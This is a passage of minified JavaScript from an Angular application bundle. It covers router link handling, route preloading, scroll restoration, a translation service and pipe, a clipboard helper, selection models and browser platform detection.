X4(e.id,this.serializeUrl(e.extractedUrl),i,n);this.triggerEvent(r),e.resolve(!1)}generateNgRouterState(e,i){return"computed"===this.canceledNavigationResolution?{navigationId:e,\u0275routerPageId:i}:{navigationId:e}}}return t.\u0275fac=function(e){pd()},t.\u0275prov=hi({token:t,factory:function(){return XL()},providedIn:"root"}),t})();function YL(t){return"imperative"!==t}let x1=(()=>{class t{constructor(e,i,n,r,c){this.router=e,this.route=i,this.tabIndexAttribute=n,this.renderer=r,this.el=c,this._preserveFragment=!1,this._skipLocationChange=!1,this._replaceUrl=!1,this.commands=null,this.onChanges=new J,this.setTabIndexIfNotOnNativeEl("0")}set preserveFragment(e){this._preserveFragment=Eh(e)}get preserveFragment(){return this._preserveFragment}set skipLocationChange(e){this._skipLocationChange=Eh(e)}get skipLocationChange(){return this._skipLocationChange}set replaceUrl(e){this._replaceUrl=Eh(e)}get replaceUrl(){return this._replaceUrl}setTabIndexIfNotOnNativeEl(e){if(null!=this.tabIndexAttribute)return;const i=this.renderer,n=this.el.nativeElement;null!==e?i.setAttribute(n,"tabindex",e):i.removeAttribute(n,"tabindex")}ngOnChanges(e){this.onChanges.next(this)}set routerLink(e){null!=e?(this.commands=Array.isArray(e)?e:[e],this.setTabIndexIfNotOnNativeEl("0")):(this.commands=null,this.setTabIndexIfNotOnNativeEl(null))}onClick(){return null===this.urlTree||this.router.navigateByUrl(this.urlTree,{skipLocationChange:this.skipLocationChange,replaceUrl:this.replaceUrl,state:this.state}),!0}get urlTree(){return null===this.commands?null:this.router.createUrlTree(this.commands,{relativeTo:void 0!==this.relativeTo?this.relativeTo:this.route,queryParams:this.queryParams,fragment:this.fragment,queryParamsHandling:this.queryParamsHandling,preserveFragment:this.preserveFragment})}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oo),Ee(El),Vr("tabindex"),Ee(wr),Ee(mi))},t.\u0275dir=Ot({type:t,selectors:[["","routerLink","",5,"a",5,"area"]],hostBindings:function(e,i){1&e&&he("click",function(){return i.onClick()})},inputs:{queryParams:"queryParams",fragment:"fragment",queryParamsHandling:"queryParamsHandling",state:"state",relativeTo:"relativeTo",preserveFragment:"preserveFragment",skipLocationChange:"skipLocationChange",replaceUrl:"replaceUrl",routerLink:"routerLink"},standalone:!0,features:[sa]}),t})();class JL{}let Mhe=(()=>{class t{constructor(e,i,n,r,c){this.router=e,this.injector=n,this.preloadingStrategy=r,this.loader=c}setUpPreloading(){this.subscription=this.router.events.pipe(Dn(e=>e instanceof Ph),Rh(()=>this.preload())).subscribe(()=>{})}preload(){return this.processRoutes(this.injector,this.router.config)}ngOnDestroy(){this.subscription&&this.subscription.unsubscribe()}processRoutes(e,i){var n,r,c;const d=[];for(const T of i){T.providers&&!T._injector&&(T._injector=Sv(T.providers,e,`Route: ${T.path}`));const k=null!==(n=T._injector)&&void 0!==n?n:e,q=null!==(r=T._loadedInjector)&&void 0!==r?r:k;T.loadChildren&&!T._loadedRoutes&&void 0===T.canLoad||T.loadComponent&&!T._loadedComponent?d.push(this.preloadConfig(k,T)):(T.children||T._loadedRoutes)&&d.push(this.processRoutes(q,null!==(c=T.children)&&void 0!==c?c:T._loadedRoutes))}return Sa(d).pipe(Yt())}preloadConfig(e,i){return this.preloadingStrategy.preload(i,()=>{let n;n=i.loadChildren&&void 0===i.canLoad?this.loader.loadChildren(e,i):Bi(null);const r=n.pipe(Ut(c=>{var d;return null===c?Bi(void 0):(i._loadedRoutes=c.routes,i._loadedInjector=c.injector,this.processRoutes(null!==(d=c.injector)&&void 0!==d?d:e,c.routes))}));return i.loadComponent&&!i._loadedComponent?Sa([r,this.loader.loadComponent(i)]).pipe(Yt()):r})}}return t.\u0275fac=function(e){return new(e||t)(At(Oo),At(WD),At(Ht),At(JL),At(qx))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const jx=new ni("");let ZL=(()=>{class t{constructor(e,i,n={}){this.router=e,this.viewportScroller=i,this.options=n,this.lastId=0,this.lastSource="imperative",this.restoredId=0,this.store={},n.scrollPositionRestoration=n.scrollPositionRestoration||"disabled",n.anchorScrolling=n.anchorScrolling||"disabled"}init(){"disabled"!==this.options.scrollPositionRestoration&&this.viewportScroller.setHistoryScrollRestoration("manual"),this.routerEventsSubscription=this.createScrollEvents(),this.scrollEventsSubscription=this.consumeScrollEvents()}createScrollEvents(){return this.router.events.subscribe(e=>{e instanceof Ey?(this.store[this.lastId]=this.viewportScroller.getScrollPosition(),this.lastSource=e.navigationTrigger,this.restoredId=e.restoredState?e.restoredState.navigationId:0):e instanceof Ph&&(this.lastId=e.id,this.scheduleScrollEvent(e,this.router.parseUrl(e.urlAfterRedirects).fragment))})}consumeScrollEvents(){return this.router.events.subscribe(e=>{e instanceof bL&&(e.position?"top"===this.options.scrollPositionRestoration?this.viewportScroller.scrollToPosition([0,0]):"enabled"===this.options.scrollPositionRestoration&&this.viewportScroller.scrollToPosition(e.position):e.anchor&&"enabled"===this.options.anchorScrolling?this.viewportScroller.scrollToAnchor(e.anchor):"disabled"!==this.options.scrollPositionRestoration&&this.viewportScroller.scrollToPosition([0,0]))})}scheduleScrollEvent(e,i){this.router.triggerEvent(new bL(e,"popstate"===this.lastSource?this.store[this.restoredId]:null,i))}ngOnDestroy(){this.routerEventsSubscription&&this.routerEventsSubscription.unsubscribe(),this.scrollEventsSubscription&&this.scrollEventsSubscription.unsubscribe()}}return t.\u0275fac=function(e){pd()},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();function w1(t,a){return{\u0275kind:t,\u0275providers:a}}function Qx(t){return[{provide:Ux,multi:!0,useValue:t}]}function tz(){const t=Po(Ko);return a=>{var e,i;const n=t.get(Jf);if(a!==n.components[0])return;const r=t.get(Oo),c=t.get(iz);1===t.get($x)&&r.initialNavigation(),null===(e=t.get(az,null,Da.Optional))||void 0===e||e.setUpPreloading(),null===(i=t.get(jx,null,Da.Optional))||void 0===i||i.init(),r.resetRootComponentType(n.componentTypes[0]),c.next(),c.complete()}}const iz=new ni("",{factory:()=>new J}),$x=new ni("",{providedIn:"root",factory:()=>1});const az=new ni("");function Ehe(t){return w1(0,[{provide:az,useExisting:Mhe},{provide:JL,useExisting:t}])}const nz=new ni("ROUTER_FORROOT_GUARD"),Dhe=[iy,{provide:lL,useClass:Ax},{provide:Oo,useFactory:XL},xy,{provide:El,useFactory:function ez(t){return t.routerState.root},deps:[Oo]},qx];function xhe(){return new S9("Router",Oo)}let bs=(()=>{class t{constructor(e){}static forRoot(e,i){return{ngModule:t,providers:[Dhe,[],Qx(e),{provide:nz,useFactory:She,deps:[[Oo,new Cc,new Fc]]},{provide:s3,useValue:i||{}},null!=i&&i.useHash?{provide:ig,useClass:qoe}:{provide:ig,useClass:iP},{provide:jx,useFactory:()=>{const t=Po(Oo),a=Po(tse),e=Po(s3);return e.scrollOffset&&a.setOffset(e.scrollOffset),new ZL(t,a,e)}},null!=i&&i.preloadingStrategy?Ehe(i.preloadingStrategy).\u0275providers:[],{provide:S9,multi:!0,useFactory:xhe},null!=i&&i.initialNavigation?khe(i):[],[{provide:oz,useFactory:tz},{provide:T9,multi:!0,useExisting:oz}]]}}static forChild(e){return{ngModule:t,providers:[Qx(e)]}}}return t.\u0275fac=function(e){return new(e||t)(At(nz,8))},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Lx]}),t})();function She(t){return"guarded"}function khe(t){return["disabled"===t.initialNavigation?w1(3,[{provide:Nv,multi:!0,useFactory:()=>{const a=Po(Oo);return()=>{a.setUpLocationChangeListener()}}},{provide:$x,useValue:2}]).\u0275providers:[],"enabledBlocking"===t.initialNavigation?w1(2,[{provide:$x,useValue:0},{provide:Nv,multi:!0,deps:[Ko],useFactory:a=>{const e=a.get(Hoe,Promise.resolve());let i=!1;return()=>e.then(()=>new Promise(r=>{const c=a.get(Oo),d=a.get(iz);(function n(r){a.get(Oo).events.pipe(Dn(d=>d instanceof Ph||d instanceof X4||d instanceof yL),Xe(d=>d instanceof Ph||d instanceof X4&&(0===d.code||1===d.code)&&null),Dn(d=>null!==d),Cn(1)).subscribe(()=>{r()})})(()=>{r(!0),i=!0}),c.afterPreactivation=()=>(r(!0),i||d.closed?Bi(void 0):d),c.initialNavigation()}))}}]).\u0275providers:[]]}const oz=new ni("");function Cm(t){return!!t&&(t instanceof G||ie(t.lift)&&ie(t.subscribe))}const Kx={now:()=>(Kx.delegate||Date).now(),delegate:void 0};class Ohe extends J{constructor(a=1/0,e=1/0,i=Kx){super(),this._bufferSize=a,this._windowTime=e,this._timestampProvider=i,this._buffer=[],this._infiniteTimeWindow=!0,this._infiniteTimeWindow=e===1/0,this._bufferSize=Math.max(1,a),this._windowTime=Math.max(1,e)}next(a){const{isStopped:e,_buffer:i,_infiniteTimeWindow:n,_timestampProvider:r,_windowTime:c}=this;e||(i.push(a),!n&&i.push(r.now()+c)),this._trimBuffer(),super.next(a)}_subscribe(a){this._throwIfClosed(),this._trimBuffer();const e=this._innerSubscribe(a),{_infiniteTimeWindow:i,_buffer:n}=this,r=n.slice();for(let c=0;c<r.length&&!a.closed;c+=i?1:2)a.next(r[c]);return this._checkFinalizedStatuses(a),e}_trimBuffer(){const{_bufferSize:a,_timestampProvider:e,_buffer:i,_infiniteTimeWindow:n}=this,r=(n?1:2)*a;if(a<1/0&&r<i.length&&i.splice(0,i.length-r),!n){const c=e.now();let d=0;for(let T=1;T<i.length&&i[T]<=c;T+=2)d=T;d&&i.splice(0,d+1)}}}function rz(t,a,e){let i,n=!1;return t&&"object"==typeof t?({bufferSize:i=1/0,windowTime:a=1/0,refCount:n=!1,scheduler:e}=t):i=null!=t?t:1/0,Bd({connector:()=>new Ohe(i,a,e),resetOnError:!0,resetOnComplete:!1,resetOnRefCountZero:n})}class Py{}let sz=(()=>{class t extends Py{getTranslation(e){return Bi({})}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();class Xx{}let cz=(()=>{class t{handle(e){return e.key}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();function m3(t,a){if(t===a)return!0;if(null===t||null===a)return!1;if(t!=t&&a!=a)return!0;let n,r,c,e=typeof t;if(e==typeof a&&"object"==e){if(!Array.isArray(t)){if(Array.isArray(a))return!1;for(r in c=Object.create(null),t){if(!m3(t[r],a[r]))return!1;c[r]=!0}for(r in a)if(!(r in c)&&void 0!==a[r])return!1;return!0}if(!Array.isArray(a))return!1;if((n=t.length)==a.length){for(r=0;r<n;r++)if(!m3(t[r],a[r]))return!1;return!0}}return!1}function lp(t){return null!=t}function Yx(t){return t&&"object"==typeof t&&!Array.isArray(t)}function lz(t,a){let e=Object.assign({},t);return Yx(t)&&Yx(a)&&Object.keys(a).forEach(i=>{Yx(a[i])?i in t?e[i]=lz(t[i],a[i]):Object.assign(e,{[i]:a[i]}):Object.assign(e,{[i]:a[i]})}),e}class u3{}let dz=(()=>{class t extends u3{constructor(){super(...arguments),this.templateMatcher=/{{\s?([^{}\s]*)\s?}}/g}interpolate(e,i){let n;return n="string"==typeof e?this.interpolateString(e,i):"function"==typeof e?this.interpolateFunction(e,i):e,n}getValue(e,i){let n="string"==typeof i?i.split("."):[i];i="";do{i+=n.shift(),!lp(e)||!lp(e[i])||"object"!=typeof e[i]&&n.length?n.length?i+=".":e=void 0:(e=e[i],i="")}while(n.length);return e}interpolateFunction(e,i){return e(i)}interpolateString(e,i){return i?e.replace(this.templateMatcher,(n,r)=>{let c=this.getValue(i,r);return lp(c)?c:n}):e}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();class h3{}let mz=(()=>{class t extends h3{compile(e,i){return e}compileTranslations(e,i){return e}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();class uz{constructor(){this.currentLang=this.defaultLang,this.translations={},this.langs=[],this.onTranslationChange=new Tt,this.onLangChange=new Tt,this.onDefaultLangChange=new Tt}}const Jx=new ni("USE_STORE"),Zx=new ni("USE_DEFAULT_LANG"),ew=new ni("DEFAULT_LANGUAGE"),tw=new ni("USE_EXTEND");let Sn=(()=>{class t{constructor(e,i,n,r,c,d=!0,T=!1,k=!1,q){this.store=e,this.currentLoader=i,this.compiler=n,this.parser=r,this.missingTranslationHandler=c,this.useDefaultLang=d,this.isolate=T,this.extend=k,this.pending=!1,this._onTranslationChange=new Tt,this._onLangChange=new Tt,this._onDefaultLangChange=new Tt,this._langs=[],this._translations={},this._translationRequests={},q&&this.setDefaultLang(q)}get onTranslationChange(){return this.isolate?this._onTranslationChange:this.store.onTranslationChange}get onLangChange(){return this.isolate?this._onLangChange:this.store.onLangChange}get onDefaultLangChange(){return this.isolate?this._onDefaultLangChange:this.store.onDefaultLangChange}get defaultLang(){return this.isolate?this._defaultLang:this.store.defaultLang}set defaultLang(e){this.isolate?this._defaultLang=e:this.store.defaultLang=e}get currentLang(){return this.isolate?this._currentLang:this.store.currentLang}set currentLang(e){this.isolate?this._currentLang=e:this.store.currentLang=e}get langs(){return this.isolate?this._langs:this.store.langs}set langs(e){this.isolate?this._langs=e:this.store.langs=e}get translations(){return this.isolate?this._translations:this.store.translations}set translations(e){this.isolate?this._translations=e:this.store.translations=e}setDefaultLang(e){if(e===this.defaultLang)return;let i=this.retrieveTranslations(e);void 0!==i?(null==this.defaultLang&&(this.defaultLang=e),i.pipe(Cn(1)).subscribe(n=>{this.changeDefaultLang(e)})):this.changeDefaultLang(e)}getDefaultLang(){return this.defaultLang}use(e){if(e===this.currentLang)return Bi(this.translations[e]);let i=this.retrieveTranslations(e);return void 0!==i?(this.currentLang||(this.currentLang=e),i.pipe(Cn(1)).subscribe(n=>{this.changeLang(e)}),i):(this.changeLang(e),Bi(this.translations[e]))}retrieveTranslations(e){let i;return(void 0===this.translations[e]||this.extend)&&(this._translationRequests[e]=this._translationRequests[e]||this.getTranslation(e),i=this._translationRequests[e]),i}getTranslation(e){this.pending=!0;const i=this.currentLoader.getTranslation(e).pipe(rz(1),Cn(1));return this.loadingTranslations=i.pipe(Xe(n=>this.compiler.compileTranslations(n,e)),rz(1),Cn(1)),this.loadingTranslations.subscribe({next:n=>{this.translations[e]=this.extend&&this.translations[e]?Object.assign(Object.assign({},n),this.translations[e]):n,this.updateLangs(),this.pending=!1},error:n=>{this.pending=!1}}),i}setTranslation(e,i,n=!1){i=this.compiler.compileTranslations(i,e),this.translations[e]=(n||this.extend)&&this.translations[e]?lz(this.translations[e],i):i,this.updateLangs(),this.onTranslationChange.emit({lang:e,translations:this.translations[e]})}getLangs(){return this.langs}addLangs(e){e.forEach(i=>{-1===this.langs.indexOf(i)&&this.langs.push(i)})}updateLangs(){this.addLangs(Object.keys(this.translations))}getParsedResult(e,i,n){let r;if(i instanceof Array){let c={},d=!1;for(let T of i)c[T]=this.getParsedResult(e,T,n),Cm(c[T])&&(d=!0);return d?$6(i.map(k=>Cm(c[k])?c[k]:Bi(c[k]))).pipe(Xe(k=>{let q={};return k.forEach((Y,te)=>{q[i[te]]=Y}),q})):c}if(e&&(r=this.parser.interpolate(this.parser.getValue(e,i),n)),void 0===r&&null!=this.defaultLang&&this.defaultLang!==this.currentLang&&this.useDefaultLang&&(r=this.parser.interpolate(this.parser.getValue(this.translations[this.defaultLang],i),n)),void 0===r){let c={key:i,translateService:this};void 0!==n&&(c.interpolateParams=n),r=this.missingTranslationHandler.handle(c)}return void 0!==r?r:i}get(e,i){if(!lp(e)||!e.length)throw new Error('Parameter "key" required');if(this.pending)return this.loadingTranslations.pipe(Rh(n=>Cm(n=this.getParsedResult(n,e,i))?n:Bi(n)));{let n=this.getParsedResult(this.translations[this.currentLang],e,i);return Cm(n)?n:Bi(n)}}getStreamOnTranslationChange(e,i){if(!lp(e)||!e.length)throw new Error('Parameter "key" required');return hg(sp(()=>this.get(e,i)),this.onTranslationChange.pipe(Ur(n=>{const r=this.getParsedResult(n.translations,e,i);return"function"==typeof r.subscribe?r:Bi(r)})))}stream(e,i){if(!lp(e)||!e.length)throw new Error('Parameter "key" required');return hg(sp(()=>this.get(e,i)),this.onLangChange.pipe(Ur(n=>{const r=this.getParsedResult(n.translations,e,i);return Cm(r)?r:Bi(r)})))}instant(e,i){if(!lp(e)||!e.length)throw new Error('Parameter "key" required');let n=this.getParsedResult(this.translations[this.currentLang],e,i);if(Cm(n)){if(e instanceof Array){let r={};return e.forEach((c,d)=>{r[e[d]]=e[d]}),r}return e}return n}set(e,i,n=this.currentLang){this.translations[n][e]=this.compiler.compile(i,n),this.updateLangs(),this.onTranslationChange.emit({lang:n,translations:this.translations[n]})}changeLang(e){this.currentLang=e,this.onLangChange.emit({lang:e,translations:this.translations[e]}),null==this.defaultLang&&this.changeDefaultLang(e)}changeDefaultLang(e){this.defaultLang=e,this.onDefaultLangChange.emit({lang:e,translations:this.translations[e]})}reloadLang(e){return this.resetLang(e),this.getTranslation(e)}resetLang(e){this._translationRequests[e]=void 0,this.translations[e]=void 0}getBrowserLang(){if("undefined"==typeof window||void 0===window.navigator)return;let e=window.navigator.languages?window.navigator.languages[0]:null;return e=e||window.navigator.language||window.navigator.browserLanguage||window.navigator.userLanguage,void 0!==e?(-1!==e.indexOf("-")&&(e=e.split("-")[0]),-1!==e.indexOf("_")&&(e=e.split("_")[0]),e):void 0}getBrowserCultureLang(){if("undefined"==typeof window||void 0===window.navigator)return;let e=window.navigator.languages?window.navigator.languages[0]:null;return e=e||window.navigator.language||window.navigator.browserLanguage||window.navigator.userLanguage,e}}return t.\u0275fac=function(e){return new(e||t)(At(uz),At(Py),At(h3),At(u3),At(Xx),At(Zx),At(Jx),At(tw),At(ew))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),Xi=(()=>{class t{constructor(e,i){this.translate=e,this._ref=i,this.value="",this.lastKey=null,this.lastParams=[]}updateValue(e,i,n){let r=c=>{this.value=void 0!==c?c:e,this.lastKey=e,this._ref.markForCheck()};if(n){let c=this.translate.getParsedResult(n,e,i);Cm(c.subscribe)?c.subscribe(r):r(c)}this.translate.get(e,i).subscribe(r)}transform(e,...i){if(!e||!e.length)return e;if(m3(e,this.lastKey)&&m3(i,this.lastParams))return this.value;let n;if(lp(i[0])&&i.length)if("string"==typeof i[0]&&i[0].length){let r=i[0].replace(/(\')?([a-zA-Z0-9_]+)(\')?(\s)?:/g,'"$2":').replace(/:(\s)?(\')(.*?)(\')/g,':"$3"');try{n=JSON.parse(r)}catch(c){throw new SyntaxError(`Wrong parameter in TranslatePipe. Expected a valid Object, received: ${i[0]}`)}}else"object"==typeof i[0]&&!Array.isArray(i[0])&&(n=i[0]);return this.lastKey=e,this.lastParams=i,this.updateValue(e,n),this._dispose(),this.onTranslationChange||(this.onTranslationChange=this.translate.onTranslationChange.subscribe(r=>{this.lastKey&&r.lang===this.translate.currentLang&&(this.lastKey=null,this.updateValue(e,n,r.translations))})),this.onLangChange||(this.onLangChange=this.translate.onLangChange.subscribe(r=>{this.lastKey&&(this.lastKey=null,this.updateValue(e,n,r.translations))})),this.onDefaultLangChange||(this.onDefaultLangChange=this.translate.onDefaultLangChange.subscribe(()=>{this.lastKey&&(this.lastKey=null,this.updateValue(e,n))})),this.value}_dispose(){void 0!==this.onTranslationChange&&(this.onTranslationChange.unsubscribe(),this.onTranslationChange=void 0),void 0!==this.onLangChange&&(this.onLangChange.unsubscribe(),this.onLangChange=void 0),void 0!==this.onDefaultLangChange&&(this.onDefaultLangChange.unsubscribe(),this.onDefaultLangChange=void 0)}ngOnDestroy(){this._dispose()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Sn,16),Ee(Ma,16))},t.\u0275pipe=Fr({name:"translate",type:t,pure:!1}),t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),iw=(()=>{class t{static forRoot(e={}){return{ngModule:t,providers:[e.loader||{provide:Py,useClass:sz},e.compiler||{provide:h3,useClass:mz},e.parser||{provide:u3,useClass:dz},e.missingTranslationHandler||{provide:Xx,useClass:cz},uz,{provide:Jx,useValue:e.isolate},{provide:Zx,useValue:e.useDefaultLang},{provide:tw,useValue:e.extend},{provide:ew,useValue:e.defaultLanguage},Sn]}}static forChild(e={}){return{ngModule:t,providers:[e.loader||{provide:Py,useClass:sz},e.compiler||{provide:h3,useClass:mz},e.parser||{provide:u3,useClass:dz},e.missingTranslationHandler||{provide:Xx,useClass:cz},{provide:Jx,useValue:e.isolate},{provide:Zx,useValue:e.useDefaultLang},{provide:tw,useValue:e.extend},{provide:ew,useValue:e.defaultLanguage},Sn]}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();class Nhe{constructor(a,e){this._document=e;const i=this._textarea=this._document.createElement("textarea"),n=i.style;n.position="fixed",n.top=n.opacity="0",n.left="-999em",i.setAttribute("aria-hidden","true"),i.value=a,i.readOnly=!0,this._document.body.appendChild(i)}copy(){const a=this._textarea;let e=!1;try{if(a){const i=this._document.activeElement;a.select(),a.setSelectionRange(0,a.value.length),e=this._document.execCommand("copy"),i&&i.focus()}}catch(i){}return e}destroy(){const a=this._textarea;a&&(a.remove(),this._textarea=void 0)}}let hz=(()=>{class t{constructor(e){this._document=e}copy(e){const i=this.beginCopy(e),n=i.copy();return i.destroy(),n}beginCopy(e){return new Nhe(e,this._document)}}return t.\u0275fac=function(e){return new(e||t)(At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),fz=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();function wi(t){return null!=t&&"false"!=`${t}`}function Uo(t,a=0){return pz(t)?Number(t):a}function pz(t){return!isNaN(parseFloat(t))&&!isNaN(Number(t))}function Oy(t){return Array.isArray(t)?t:[t]}function Ms(t){return null==t?"":"string"==typeof t?t:`${t}px`}function Gr(t){return t instanceof mi?t.nativeElement:t}class _z{}function f3(t){return t&&"function"==typeof t.connect&&!(t instanceof bx)}class gz{applyChanges(a,e,i,n,r){a.forEachOperation((c,d,T)=>{let k,q;if(null==c.previousIndex){const Y=i(c,d,T);k=e.createEmbeddedView(Y.templateRef,Y.context,Y.index),q=1}else null==T?(e.remove(d),q=3):(k=e.get(d),e.move(k,T),q=2);r&&r({context:null==k?void 0:k.context,operation:q,record:c})})}detach(){}}class I1{constructor(a=!1,e,i=!0,n){this._multiple=a,this._emitChanges=i,this.compareWith=n,this._selection=new Set,this._deselectedToEmit=[],this._selectedToEmit=[],this.changed=new J,e&&e.length&&(a?e.forEach(r=>this._markSelected(r)):this._markSelected(e[0]),this._selectedToEmit.length=0)}get selected(){return this._selected||(this._selected=Array.from(this._selection.values())),this._selected}select(...a){this._verifyValueAssignment(a),a.forEach(i=>this._markSelected(i));const e=this._hasQueuedChanges();return this._emitChangeEvent(),e}deselect(...a){this._verifyValueAssignment(a),a.forEach(i=>this._unmarkSelected(i));const e=this._hasQueuedChanges();return this._emitChangeEvent(),e}setSelection(...a){this._verifyValueAssignment(a);const e=this.selected,i=new Set(a);a.forEach(r=>this._markSelected(r)),e.filter(r=>!i.has(r)).forEach(r=>this._unmarkSelected(r));const n=this._hasQueuedChanges();return this._emitChangeEvent(),n}toggle(a){return this.isSelected(a)?this.deselect(a):this.select(a)}clear(a=!0){this._unmarkAll();const e=this._hasQueuedChanges();return a&&this._emitChangeEvent(),e}isSelected(a){if(this.compareWith){for(const e of this._selection)if(this.compareWith(e,a))return!0;return!1}return this._selection.has(a)}isEmpty(){return 0===this._selection.size}hasValue(){return!this.isEmpty()}sort(a){this._multiple&&this.selected&&this._selected.sort(a)}isMultipleSelection(){return this._multiple}_emitChangeEvent(){this._selected=null,(this._selectedToEmit.length||this._deselectedToEmit.length)&&(this.changed.next({source:this,added:this._selectedToEmit,removed:this._deselectedToEmit}),this._deselectedToEmit=[],this._selectedToEmit=[])}_markSelected(a){this.isSelected(a)||(this._multiple||this._unmarkAll(),this.isSelected(a)||this._selection.add(a),this._emitChanges&&this._selectedToEmit.push(a))}_unmarkSelected(a){this.isSelected(a)&&(this._selection.delete(a),this._emitChanges&&this._deselectedToEmit.push(a))}_unmarkAll(){this.isEmpty()||this._selection.forEach(a=>this._unmarkSelected(a))}_verifyValueAssignment(a){}_hasQueuedChanges(){return!(!this._deselectedToEmit.length&&!this._selectedToEmit.length)}}let aw=(()=>{class t{constructor(){this._listeners=[]}notify(e,i){for(let n of this._listeners)n(e,i)}listen(e){return this._listeners.push(e),()=>{this._listeners=this._listeners.filter(i=>e!==i)}}ngOnDestroy(){this._listeners=[]}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const Ny=new ni("_ViewRepeater");function ea(t){return Ie((a,e)=>{pn(t).subscribe(Ae(e,()=>e.complete(),y)),!e.closed&&a.subscribe(e)})}const zhe=new ni("cdk-dir-doc",{providedIn:"root",factory:function Whe(){return Po(ga)}}),Fhe=/^(ar|ckb|dv|he|iw|fa|nqo|ps|sd|ug|ur|yi|.*[-_](Adlm|Arab|Hebr|Nkoo|Rohg|Thaa))(?!.*[-_](Latn|Cyrl)($|-|_))($|-|_)/i;let nw,Cr=(()=>{class t{constructor(e){if(this.value="ltr",this.change=new Tt,e){const n=e.documentElement?e.documentElement.dir:null;this.value=function Vhe(t){const a=(null==t?void 0:t.toLowerCase())||"";return"auto"===a&&"undefined"!=typeof navigator&&(null==navigator?void 0:navigator.language)?Fhe.test(navigator.language)?"rtl":"ltr":"rtl"===a?"rtl":"ltr"}((e.body?e.body.dir:null)||n||"ltr")}}ngOnDestroy(){this.change.complete()}}return t.\u0275fac=function(e){return new(e||t)(At(zhe,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),R1=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();try{nw="undefined"!=typeof Intl&&Intl.v8BreakIterator}catch(t){nw=!1}let S1,sr=(()=>{class t{constructor(e){this._platformId=e,this.isBrowser=this._platformId?ng(this._platformId):"object"==typeof document&&!!document,this.EDGE=this.isBrowser&&/(edge)/i.test(navigator.userAgent),this.TRIDENT=this.isBrowser&&/(msie|trident)/i.test(navigator.userAgent),this.BLINK=this.isBrowser&&!(!window.chrome&&!nw)&&"undefined"!=typeof CSS&&!this.EDGE&&!this.TRIDENT,this.WEBKIT=this.isBrowser&&/AppleWebKit/i.test(navigator.userAgent)&&!this.BLINK&&!this.EDGE&&!this.TRIDENT,this.IOS=this.isBrowser&&/iPad|iPhone|iPod/.test(navigator.userAgent)&&!("MSStream"in window),this.FIREFOX=this.isBrowser&&/(firefox|minefield)/i.test(navigator.userAgent),this.ANDROID=this.isBrowser&&/android/i.test(navigator.userAgent)&&!this.TRIDENT,this.SAFARI=this.isBrowser&&/safari/i.test(navigator.userAgent)&&this.WEBKIT}}return t.\u0275fac=function(e){return new(e||t)(At(lm))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const yz=["color","button","checkbox","date","datetime-local","email","file","hidden","image","month","number","password","radio","range","reset","search","submit","tel","text","time","url","week"];function bz(){if(S1)return S1;if("object"!=typeof document||!document)return S1=new Set(yz),S1;let t=document.createElement("input");return S1=new Set(yz.filter(a=>(t.setAttribute("type",a),t.type===a))),S1}let Ly,p3,gg,ow;function ym(t){return function Bhe(){if(null==Ly&&"undefined"!=typeof window)try{window.addEventListener("test",null,Object.defineProperty({},"passive",{get:()=>Ly=!0}))}finally{Ly=Ly||!1}return Ly}()?t:!!t.capture}function Mz(){if(null==gg){if("object"!=typeof document||!document||"function"!=typeof Element||!Element)return gg=!1,gg;if("scrollBehavior"in document.documentElement.style)gg=!0;else{const t=Element.prototype.scrollTo;gg=!!t&&!/\{\s*\[native code\]\s*\}/.test(t.toString())}}return gg}function zy(){if("object"!=typeof document||!document)return 0;if(null==p3){const t=document.createElement("div"),a=t.style;t.dir="rtl",a.width="1px",a.overflow="auto",a.visibility="hidden",a.pointerEvents="none",a.position="absolute";const e=document.createElement("div"),i=e.style;i.width="2px",i.height="1px",t.appendChild(e),document.body.appendChild(t),p3=0,0===t.scrollLeft&&(t.scrollLeft=1,p3=0===t.scrollLeft?1:2),t.remove()}return p3}function _3(t){if(function Hhe(){if(null==ow){const t="undefined"!=typeof document?document.head:null;ow=!(!t||!t.createShadowRoot&&!t.attachShadow)}return ow}()){const a=t.getRootNode?t.getRootNode():null;if("undefined"!=typeof ShadowRoot&&ShadowRoot&&a instanceof ShadowRoot)return a}return null}function g3(){let t="undefined"!=typeof document&&document?document.activeElement:null;for(;t&&t.shadowRoot;){const a=t.shadowRoot.activeElement;if(a===t)break;t=a}return t}function wd(t){return t.composedPath?t.composedPath()[0]:t.target}function rw(){return"undefined"!=typeof __karma__&&!!__karma__||"undefined"!=typeof jasmine&&!!jasmine||"undefined"!=typeof jest&&!!jest||"undefined"!=typeof Mocha&&!!Mocha}const Uhe=["addListener","removeListener"],qhe=["addEventListener","removeEventListener"],Ghe=["on","off"];function Tc(t,a,e,i){if(ie(e)&&(i=e,e=void 0),i)return Tc(t,a,e).pipe(Q6(i));const[n,r]=function $he(t){return ie(t.addEventListener)&&ie(t.removeEventListener)}(t)?qhe.map(c=>d=>t[c](a,d,e)):function jhe(t){return ie(t.addListener)&&ie(t.removeListener)}(t)?Uhe.map(vz(t,a)):function Qhe(t){return 